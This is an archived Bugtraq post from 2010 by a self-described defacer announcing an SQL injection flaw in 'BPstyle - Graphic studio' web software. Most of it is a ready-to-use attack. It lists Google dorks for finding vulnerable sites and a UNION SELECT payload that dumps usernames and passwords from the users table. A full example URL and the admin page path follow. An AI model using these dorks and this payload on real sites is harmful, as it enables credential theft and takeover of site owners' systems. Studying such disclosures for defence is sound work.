[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201004300814.o3U8Enfv031766@www3.securityfocus.com>
Date: Fri, 30 Apr 2010 02:14:49 -0600
From: md.r00t.defacer@...il.com
To: bugtraq@...urityfocus.com
Subject: BPstyle - Graphic studio SQL Injection Vulnerabilities
#-------------------In The Name Of God------------
# BPstyle - Graphic studio SQL Injection Vulnerabilities
###################################
#AUTHOR: md.r00t
#Mail: md.r00t.defacer@...il.com
#Webstie: www.r00t.gigfa.com
#
###################################
#Google D0rk:
# "Designed and Created by: BPstyle - Graphic studio"
# inurl:"/page/sindex.php?plug="
###################################
#Exploit:
#---------
#
-9999+UNION+SELECT+1,2,group_concat(username,0x3a,pw),4,5,6,7,8,9+from+r_users--
###################################
#Example:
#
#http://www.Site.com/page/sindex.php?plug=1&aid=-
9999+UNION+SELECT+1,2,group_concat(username,0x3a,pw),4,5,6,7,8,9+from+r_users--
###################################
#Admin Page:
#http://www.Site.com/admin
###################################
#TNX:
#Aria-Security Team (Persian Security Network),Virangar Security Team
*****************************************
Powered by blists - more mailing lists